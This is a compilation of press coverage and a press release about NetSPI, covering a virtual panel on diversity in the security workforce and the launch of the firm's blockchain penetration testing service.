The “Bridging the Security Talent Gap Through Diverse Viewpoints” virtual panel was hosted by Inkhouse, a Massachusetts based public relations firm. Guest speakers were joined by moderator Jessica Bettencourt to find an answer for the disparity in the security industry. According to Bettencourt, recent studies by (ISC)² show that women only make up 24% of the cybersecurity field, and more, that racial and ethnic minorities are more likely to face pay discrepancies and hold non-managerial roles at their companies.

As for more advice for job seekers looking to break into the market, Bettencourt asked panelists what some of the soft skills were that they most looked for in candidates.

“I have two here; the first, as much as we may not like it, is public speaking,” Melissa Miller, Managing Security Consultant at NetSPI, stressed. Preparation and clarity are important in the role, and she said public speaking exhibits that perfectly. The second, to her, is passion for the field.

You can read the full article at Security Systems News!


Help Net Security: NetSPI’s Blockchain Penetration Testing Service Helps Organizations Protect Blockchain Solutions

On October 11, NetSPI’s CTO Travis Hoyt was featured in the Help Net Security article called NetSPI’s Blockchain Penetration Testing Service Helps Organizations Protect Blockchain Solutions. Read the preview below or view it online.

+++

NetSPI announced its new deployment-inclusive blockchain penetration testing service. The company will provide a comprehensive, full-spectrum evaluation of blockchain-based deployments to enterprises by utilizing its decades of penetration testing expertise, coupled with its understanding of the architecture’s unique security concerns.

Its blockchain penetration testing services will evaluate all deployment models, including private, permissioned, consortia, and public, and various distributed ledger technologies including ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms and public chains, and more.

“Blockchain’s biggest innovations are below the surface,” according to the Forbes Blockchain 50 2022. The world’s largest organizations are now using distributed ledger technology to manage daily operations, from verifying insurance claims to tracking auto parts in the supply chain. Organizations are recognizing the scalability, competitive advantages, and revenue opportunities it presents.

“As adoption skyrockets, technology and security teams will need to quickly develop their blockchain acumen to support and protect these solutions – this begins with identifying and addressing people, process, and technology gaps,” said Travis Hoyt, Chief Technology Officer at NetSPI. “Our new blockchain penetration testing service line demonstrates NetSPI’s commitment to be relentlessly future focused, so our customers can be too.”

Enterprises currently leveraging or evaluating the potential of blockchain can partner with NetSPI to improve the security of their deployments.

You can read the article at Help Net Security!


MSSP Alert: NetSPI Launches Blockchain Penetration Testing Security Service

On October 10, NetSPI CTO Travis Hoyt was featured in the MSSP Alert article called NetSPI Launches Blockchain Penetration Testing Security Service. Read the preview below or view it online.

+++

Penetration testing and attack surface management provider NetSPI has launched its new blockchain penetration testing service.

NetSPI, in a prepared statement, stated it will “provide a comprehensive, full-spectrum evaluation of blockchain-based deployments to enterprises by utilizing its decades of penetration testing expertise, coupled with its understanding of the architecture’s unique security concerns.”

Capitalizing on Distributed Ledger Technology

The world’s largest organizations are now using distributed ledger technology to manage daily operations, from verifying insurance claims to tracking auto parts in the supply chain, according to NetSPI. Consequently, companies are recognizing the scalability, competitive advantages and revenue opportunities that distributed ledger technology presents.

NetSPI emphasized that its blockchain penetration testing services will evaluate all deployment models — private, permissioned, consortia and public, as well as various distributed ledger technologies, including ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms and public chains.

NetSPI Chief Technology Officer Travis Hoyt explained the inspiration behind his company’s new blockchain penetration testing technology:

“As adoption skyrockets, technology and security teams will need to quickly develop their blockchain acumen to support and protect these solutions. This begins with identifying and addressing people, process, and technology gaps. Our new blockchain penetration testing service line demonstrates NetSPI’s commitment to be relentlessly future focused, so our customers can be too.”

You can read the full article at MSSP Alert!


CoinTrust: NetSPI Unveils Blockchain Penetration Trial Services for Enterprises

On October 10, NetSPI CTO Travis Hoyt was featured in the CoinTrust article called NetSPI Unveils Blockchain Penetration Trial Services for Enterprises. Read the preview below or view it online.

+++

NetSPI, the pioneer in corporate penetration testing and attack surface management, has introduced a new blockchain penetration testing solution that includes deployment. The business will provide organizations with a complete, full-spectrum review of blockchain-based installations using its decades of penetration testing experience and knowledge of the architecture’s specific security problems.

Its blockchain penetration testing services will assess all deployment types, including private, permissioned, consortium, and public, as well as several distributed ledger technologies, such as ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms, and public chains, among others.

According to the Forbes Blockchain 50 2022, “Blockchain’s most significant advances remain concealed.” The world’s top corporations are increasingly using distributed ledger technology to conduct everyday operations, including the verification of insurance claims and the monitoring of car components across the supply chain. Organizations are becoming aware of its scalability, competitive benefits, and income prospects.

“As usage skyrockets, technology and security teams will need to rapidly grow their blockchain expertise to enable and secure these solutions – this starts with identifying and solving people, process, and technology gaps,” said NetSPI’s Chief Technology Officer, Travis Hoyt. “Our new blockchain penetration testing service line reflects NetSPI’s unwavering commitment to the future, allowing our clients to do the same.”

Enterprises that are actively using blockchain or exploring its possibilities may join with NetSPI to increase the security of their installations. For more information about NetSPI’s blockchain penetration testing services, please visit www.netspi.com or get in touch with us.

You can read the full article at CoinTrust!


NetSPI Introduces Deployment-Inclusive Blockchain Security Services

The penetration testing company will help enterprises leveraging or exploring blockchain uncover the security weaknesses in their deployments.

Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new deployment-inclusive blockchain penetration testing service. The company will provide a comprehensive, full-spectrum evaluation of blockchain-based deployments to enterprises by utilizing its decades of penetration testing expertise, coupled with its understanding of the architecture’s unique security concerns.

Its blockchain penetration testing services will evaluate all deployment models, including private, permissioned, consortia, and public, and various distributed ledger technologies including ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms and public chains, and more.

“Blockchain’s biggest innovations are below the surface,” according to the Forbes Blockchain 50 2022. The world’s largest organizations are now using distributed ledger technology to manage daily operations, from verifying insurance claims to tracking auto parts in the supply chain. Organizations are recognizing the scalability, competitive advantages, and revenue opportunities it presents.

“As adoption skyrockets, technology and security teams will need to quickly develop their blockchain acumen to support and protect these solutions – this begins with identifying and addressing people, process, and technology gaps,” said Travis Hoyt, Chief Technology Officer at NetSPI. “Our new blockchain penetration testing service line demonstrates NetSPI’s commitment to be relentlessly future focused, so our customers can be too.”

Enterprises currently leveraging or evaluating the potential of blockchain can partner with NetSPI to improve the security of their deployments.

To learn more about NetSPI’s blockchain penetration testing services, visit www.netspi.com or contact us.

About NetSPI  

NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI, a KKR and Ten Eleven Ventures portfolio company, is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn. 

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI 
netspi@inkhouse.com
(774) 451-5142 
